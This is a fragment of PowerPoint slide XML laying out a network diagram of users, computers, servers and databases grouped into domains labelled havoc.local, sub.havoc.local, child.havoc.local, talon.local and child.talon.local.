                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E1D4ECB-E82F-85E9-E2D7-272B8D755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9718" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="83" name="Graphic 82" descr="Computer with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C6DF2CD-F9F7-EADD-0F7C-E22AFFA44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3124" y="2694309"/>
              <a:ext cx="1230200" cy="12302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6511054-1A4E-486E-7682-A1EB5F3D7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800" y="2670259"/>
              <a:ext cx="1230200" cy="123020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ECED3EF-18AC-E704-ED61-82205F212884}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4898985" y="785956"/>
              <a:ext cx="2480204" cy="1351068"/>
              <a:chOff x="5076713" y="972294"/>
              <a:chExt cx="1899629" cy="1137002"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="92" name="Graphic 91" descr="Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2FB6A0F-FF0E-4662-E461-BC9283AD7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76713" y="11855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3" name="Graphic 92" descr="Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A81F1EA9-6980-0735-6D54-52646ECE0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80209" y="9722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4" name="Graphic 93" descr="Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BEF5B3D-20CD-5F80-D297-E3214CA7B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61942" y="1194896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7E9570B-DE54-53FE-44BE-51221918882C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="93" idx="2"/>
              <a:endCxn id="84" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4536900" y="1872512"/>
              <a:ext cx="1616394" cy="79774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3CA932E-E7C3-97F2-AA65-610E930C92A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="93" idx="2"/>
              <a:endCxn id="83" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6153294" y="1872512"/>
              <a:ext cx="94930" cy="82179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120448-BEF9-BBD5-B6FF-8E267B99702F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>
              <a:off x="6153294" y="1872512"/>
              <a:ext cx="3041524" cy="26226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8F41834-96CF-8875-0B16-044AB7F7C963}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="84" idx="2"/>
              <a:endCxn id="80" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2958250" y="3900459"/>
              <a:ext cx="1578650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72B651E-A8B1-914D-5C7A-D42301432527}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="84" idx="2"/>
              <a:endCxn id="79" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4523151" y="3900459"/>
              <a:ext cx="13749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8DC9314-FDF2-C263-7AEC-8F89C4142CAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="84" idx="2"/>
              <a:endCxn id="81" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4536900" y="3900459"/>
              <a:ext cx="1805417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5730416-DA43-FDF5-CE92-2067983E34A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7089837" y="4261390"/>
            <a:ext cx="1991768" cy="1586406"/>
            <a:chOff x="1362075" y="627997"/>
            <a:chExt cx="9548701" cy="5444047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D11E0279-397D-8E72-C11A-9E998F44E36E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1362075" y="627997"/>
              <a:ext cx="9548701" cy="5444047"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1782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Graphic 96" descr="User with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{247AA99C-C132-DF9D-7DF0-3642170C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8051" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="98" name="Graphic 97" descr="User with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B2078E1-7D1A-9547-234F-6E0FC685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3150" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="99" name="Graphic 98" descr="Computer with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F810D841-1AE1-FB3B-5A5B-E7EBAEF7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7217" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="100" name="Graphic 99" descr="Server with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67360F3F-A062-A4F5-CF33-387D671A1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9718" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="101" name="Graphic 100" descr="Computer with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{921B574C-9EB1-333F-51CB-72CAB421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3124" y="2694309"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="102" name="Graphic 101" descr="User with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21FA0F20-109C-2525-F734-6320E425D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800" y="2670259"/>
              <a:ext cx="1230200" cy="1230200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B9139A8-0554-4A75-6F1E-C59D2AAA880D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4898985" y="785956"/>
              <a:ext cx="2480204" cy="1351068"/>
              <a:chOff x="5076713" y="972294"/>
              <a:chExt cx="1899629" cy="1137002"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="110" name="Graphic 109" descr="Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60C1E205-8E90-6902-5182-00C7E259B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76713" y="11855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1" name="Graphic 110" descr="Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7551594B-732D-FB8C-E493-0A3700915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80209" y="9722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2" name="Graphic 111" descr="Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE6770CE-F966-8468-3EA9-E3A64B46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61942" y="1194896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0AEDC7F-43A8-6A98-7324-15589B1974F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="111" idx="2"/>
              <a:endCxn id="102" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4536900" y="1872512"/>
              <a:ext cx="1616394" cy="79774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52E06BB-61CA-C615-41DF-1224ECCECC7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="111" idx="2"/>
              <a:endCxn id="101" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6153294" y="1872512"/>
              <a:ext cx="94930" cy="82179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7EA24DA-A62F-B7B1-7CC4-5560E2CB4390}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="111" idx="2"/>
              <a:endCxn id="100" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6153294" y="1872512"/>
              <a:ext cx="3041524" cy="26226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6B4994C-7DA1-EDA2-F146-ED770F4CA00A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="102" idx="2"/>
              <a:endCxn id="98" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2958250" y="3900459"/>
              <a:ext cx="1578650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54415A8-1629-074F-CD68-C425312FAB5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="102" idx="2"/>
              <a:endCxn id="97" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4523151" y="3900459"/>
              <a:ext cx="13749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85EFCF6-F514-762D-FC02-DCF6434D6BFE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="102" idx="2"/>
              <a:endCxn id="99" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4536900" y="3900459"/>
              <a:ext cx="1805417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F3FDA97-1D51-ADE7-FC4E-435922CA2B89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="78" idx="2"/>
            <a:endCxn id="96" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8085721" y="3871916"/>
            <a:ext cx="190693" cy="38947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ABC1C22-3B90-7D55-83F6-62B2601E80AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="93" idx="0"/>
            <a:endCxn id="65" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4144844" y="1889808"/>
            <a:ext cx="4135801" cy="15298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bject 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{147896D6-A80D-1653-02B5-869968E7B373}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1169234" y="6077149"/>
            <a:ext cx="2956225" cy="39070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1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child.havoc.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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123" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{575B5395-E177-34A3-893D-4780E85B8D42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3585194" y="4360278"/>
            <a:ext cx="2956225" cy="39070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1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sub.havoc.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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124" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C216A6E5-1915-E6F0-BB1B-DB4C2B0A5CAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2690538" y="1515733"/>
            <a:ext cx="2956225" cy="39070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1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havoc.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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126" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1091160-6458-50E4-1AE8-928BE5F62DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6759232" y="1344984"/>
            <a:ext cx="2956225" cy="39070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1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talon.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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127" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1457F51E-6D61-F4EE-D4F2-C46057F50C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6650555" y="5814836"/>
            <a:ext cx="2956225" cy="39070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1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child.talon.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800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5839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53F510-B1A8-CA38-79B5-3ECCCFD9E589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6221600" y="1614306"/>
            <a:ext cx="4613534" cy="3509993"/>
            <a:chOff x="1362075" y="627997"/>
            <a:chExt cx="9548701" cy="544404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B85D880-C9BA-B13E-70A4-2261ECE6130A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1362075" y="627997"/>
              <a:ext cx="9548701" cy="5444047"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1782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User with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAE78D89-59C4-1B7B-A426-01C2AE214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8051" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom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7B4CE047-FE16-AEF6-8966-4D9D5E33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3150" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Graphic 8" descr="Computer with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{419E3FF3-2446-C461-C473-F1B3FFB99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7217" y="4495152"/>
              <a:ext cx="1230200" cy="123020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D952FEEE-D522-8BCC-FC88-95A918F7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9718" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Graphic 12" descr="Computer with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5DD725D-BE6C-5D83-99B2-D15D6CEA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3124" y="2694309"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Graphic 14" descr="User with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02E97E8-128B-583D-194C-91E78FBD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800" y="2670259"/>
              <a:ext cx="1230200" cy="123020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9B0BBFE-5A3D-D655-305A-07D008AB9D66}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4898985" y="785956"/>
              <a:ext cx="2480204" cy="1351068"/>
              <a:chOff x="5076713" y="972294"/>
              <a:chExt cx="1899629" cy="1137002"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="17" name="Graphic 16" descr="Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EA142FF-BB9F-A01D-0964-E257992D9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76713" y="11855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Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DD306A7-013F-6903-D9D6-35D3094E8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80209" y="9722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Graphic 18" descr="Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F33E96D4-F7F6-1F50-DF46-0543117F3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61942" y="1194896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680C99B-4885-7A54-6422-47A1A41752A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="18" idx="2"/>
              <a:endCxn id="15" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4536900" y="1872512"/>
              <a:ext cx="1616394" cy="79774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58A2F0-65D2-B982-6498-4065F8BF5B2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="18" idx="2"/>
              <a:endCxn id="13" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6153294" y="1872512"/>
              <a:ext cx="94930" cy="82179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FD779E-324B-BFE3-B78B-7A4431F2E811}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="18" idx="2"/>
              <a:endCxn id="12" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6153294" y="1872512"/>
              <a:ext cx="3041524" cy="26226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471AED-B3FC-6F83-7683-175C9D74EC63}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="15" idx="2"/>
              <a:endCxn id="8" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2958250" y="3900459"/>
              <a:ext cx="1578650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151102-6069-080E-A70D-FD7D272EFA81}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="15" idx="2"/>
              <a:endCxn id="7" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4523151" y="3900459"/>
              <a:ext cx="13749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72B73D-9343-6589-DC53-6816494DF9B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4536900" y="3900459"/>
              <a:ext cx="1805417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200525-A344-A611-E83B-9BBEC51BB906}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1211355" y="2302055"/>
            <a:ext cx="4562847" cy="3509993"/>
            <a:chOff x="1362075" y="627997"/>
            <a:chExt cx="9548701" cy="54440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CE8CC14-46C7-F583-F907-7235FB12C8CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1362075" y="627997"/>
              <a:ext cx="9548701" cy="5444047"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 17828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User with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1325A312-739A-4ECC-55C8-F7AAB838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8051" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Graphic 29" descr="User with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6966F2F-D375-C784-29EB-2A3B28F2C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43150" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="Graphic 30" descr="Computer with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E19117C-0674-7242-B5D5-79FC67033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7217" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Graphic 31" descr="Server with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A0B691C-C47F-0C5F-3328-758CCC02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9718" y="4495152"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Graphic 32" descr="Computer with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0641FA03-4497-DE01-5C61-97E679629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3124" y="2694309"/>
              <a:ext cx="1230200" cy="1230200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Graphic 33" descr="User with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C839DF34-4033-8A75-0CD4-40543AFBD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800" y="2670259"/>
              <a:ext cx="1230200" cy="12302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4BCDAF6-D8F1-F0F1-5BF8-625615AD424B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4898985" y="785956"/>
              <a:ext cx="2480204" cy="1351068"/>
              <a:chOff x="5076713" y="972294"/>
              <a:chExt cx="1899629" cy="1137002"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="42" name="Graphic 41" descr="Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0AF9DC0-2262-50D7-7FC6-C70D44444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76713" y="11855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Graphic 42" descr="Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A95D1B9-BD6F-B14A-71B6-39C225AA6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80209" y="9722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Database with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06D5CCA7-34BB-8374-7223-128C58D95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61942" y="1194896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591F1B-3CB0-C9C8-6599-8A3A850CE444}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="43" idx="2"/>
              <a:endCxn id="34" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4536900" y="1872512"/>
              <a:ext cx="1616394" cy="79774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70FDA7-6A17-ECF2-A237-572ED025E35B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
